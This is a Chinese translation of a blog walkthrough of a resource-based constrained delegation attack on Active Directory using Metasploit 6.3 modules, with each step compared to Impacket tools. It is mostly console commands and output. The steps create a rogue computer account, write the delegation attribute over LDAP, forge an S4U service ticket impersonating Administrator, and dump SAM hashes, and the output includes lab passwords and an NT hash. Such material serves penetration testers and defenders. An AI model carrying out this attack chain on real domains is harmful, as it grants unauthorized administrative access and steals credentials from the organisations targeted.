本文为翻译文章,有需要的师傅可以直接点击阅读原文,查看原文。
Metasploit最近发布了6.3版本。它带来了一大批与LDAP操作和使用Kerberos认证有关的新功能。以下是MSF官网公告:
Metasploit Framework 6.3现已发布🎉。
新功能包括本地Kerberos认证支持、简化的活动目录攻击工作流程(AD CS、AD DS),以及请求、伪造和转换不同格式票据的新模块。
- Metasploit项目(@metasploit) 2023年1月30日
在这篇博客中,我想演示一下如何使用GenericWrite权限进行RBCD攻击,我发现这种攻击非常普遍。通常情况下,一个用户没有计算机的管理权限,但对计算机有通用写权限或类似的权限(通用所有、Owns等)。通过利用这种配置,就有可能获得计算机的管理权限。目前有两种主要的方法来执行这种攻击,要么使用Rubeus/Powermad/Powerview的组合,要么使用Impacket中的各种脚本。
为了解释一些新的功能,我将把Metasploit内的模块与Impacket的对应模块进行比较。
首先,要进行这种攻击,你将需要一个计算机账户。 如果你没有一个在你控制之下的账户,你将需要创建一个。在Impacket中,我们将使用addcomputer.py,但在这里我们将使用auxiliary/admin/dcerpc/samr_computer。
msf6 auxiliary(admin/dcerpc/samr_computer)> show options
Module options (auxiliary/admin/dcerpc/samr_computer):
Name Current Setting Required Description
--------------- -------- -----------
COMPUTER_NAME no The computer name
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass Password1 no The password for the specified username
SMBUser n00py no The username to authenticate as
When ACTION is ADD_COMPUTER:
Name Current Setting Required Description
--------------- -------- -----------
COMPUTER_PASSWORD no The password for the new computer
Auxiliary action:
Name Description
-----------
ADD_COMPUTER Add a computer account
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/samr_computer) > run
Running module against 172.16.73.6
172.16.73.6:445 - Successfully created n00py.localDESKTOP-MKFA61G6$
172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj
172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135
Auxiliary module execution completed
一旦你获得了一个新的计算机账户,我们就必须在受害者计算机上配置授权权限。 在Impacket中我们会使用rbcd.py,但在这里我们将使用auxiliary/admin/ldap/rbcd。
msf6 auxiliary(admin/ldap/rbcd) > show options
Module options (auxiliary/admin/ldap/rbcd):
Name Current Setting Required Description
---- --------------- -------- -----------
DELEGATE_FROM DESKTOP-MKFA61G6$ no The delegation source
DELEGATE_TO WIN-27M967MQJL4$ yes The delegation target
DOMAIN n00py.local no The domain to authenticate to
PASSWORD Password1 no The password to authenticate with
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
USERNAME n00py no The username to authenticate with
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > write
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Added account:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] Allowed accounts:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
一旦我们配置了委派,我们就可以为任何用户申请服务票据。 在Impacket中,我们将使用getST.py,但在这里我们将使用auxiliary/admin/kerberos/get_ticket。我们要使用Metasploit去保存最后的服务票据。
msf6 auxiliary(admin/kerberos/get_ticket) > show options
Module options (auxiliary/admin/kerberos/get_ticket):
Name Current Setting Required Description
--------------- -------- -----------
AES_KEY no The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits
CERT_FILE no The PKCS12 (.pfx) certificate file to authenticate with
CERT_PASSWORD no The certificate file's password
DOMAIN n00py.local no The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
NTHASH no The NT hash in hex string. Server must support RC4
PASSWORD 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj no The domain user's password
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish Kerberos connection and read data
USERNAME DESKTOP-MKFA61G6$ no The domain user
When ACTION is GET_TGS:
Name Current Setting Required Description
--------------- -------- -----------
IMPERSONATE Administrator no The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)
SPN CIFS/WIN-27M967MQJL4.n00py.local no The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local
Auxiliary action:
Name Description
-----------
GET_TGS Request a Ticket-Granting-Service (TGS)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/kerberos/get_ticket) > set verbose true
verbose => true
msf6 auxiliary(admin/kerberos/get_ticket) > run
Running module against 172.16.73.6
172.16.73.6:88 - Received a valid TGT-Response
172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin
172.16.73.6:88 - Getting TGS impersonating [email protected] (SPN: CIFS/WIN-27M967MQJL4.n00py.local)
172.16.73.6:88 - Received a valid TGS-Response
172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin
172.16.73.6:88 - Received a valid TGS-Response
172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin
Auxiliary module execution completed
最后,一旦我们有了这个票据,我们就可以对目标进行管理操作。通常情况下,会使用Impacket的secretsdump.py或CrackMapExec,从系统中提取hash。我们可以使用Metasploit的auxiliary/gather/windows_secrets_dump模块来代替,这相当于在CrackMapExec中同时运行-sam和-lsa。这里唯一棘手的部分是让它与Kerberos认证一起工作,这需要进入高级选项。
msf6 auxiliary(gather/windows_secrets_dump) > show options
Module options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.73.12 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser Administrator no The username to authenticate as
Auxiliary action:
Name Description
---- -----------
ALL Dump everything
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > show advanced
Module advanced options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
[TRUNCATED]
SMB::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm, kerberos)
[TRUNCATED]
Active when SMB::Auth is kerberos:
Name Current Setting Required Description
---- --------------- -------- -----------
DomainControllerRhost WIN-NDA9607EHKS.n00py.local no The resolvable rhost for the Domain Controller
KrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)
SMB::Krb5Ccname /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin no The ccache file to use for kerberos authentication
SMB::KrbOfferedEncryptionTypes AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1 yes Kerberos encryption types to offer
SMB::Rhostname WIN-27M967MQJL4.n00py.local no The rhostname which is required for kerberos - the SPN
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 172.16.73.12
[*] 172.16.73.12:445 - Opening Service Control Manager
[*] 172.16.73.12:445 - Binding to svcctl...
[+] 172.16.73.12:445 - Bound to svcctl
[*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state
[*] 172.16.73.12:445 - Starting service...
[*] 172.16.73.12:445 - Retrieving target system bootKey
[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaJD
[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaSkew1
[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaGBG
[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaData
[+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76
[*] 172.16.73.12:445 - Checking NoLMHash policy
[*] 172.16.73.12:445 - LMHashes are not being stored
[*] 172.16.73.12:445 - Saving remote SAM database
[*] 172.16.73.12:445 - Create SAM key
[*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp
[*] 172.16.73.12:445 - Dumping SAM hashes
[*] 172.16.73.12:445 - Calculating HashedBootKey from SAM
[*] 172.16.73.12:445 - Password hints:
No users with password hints on this system
[*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117:::
[TRUNCATED]
[*] Auxiliary module execution completed
至此整个过程结束。
原文始发于微信公众号(鸿鹄实验室):【翻译】使用MSF进行RBCD攻击
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论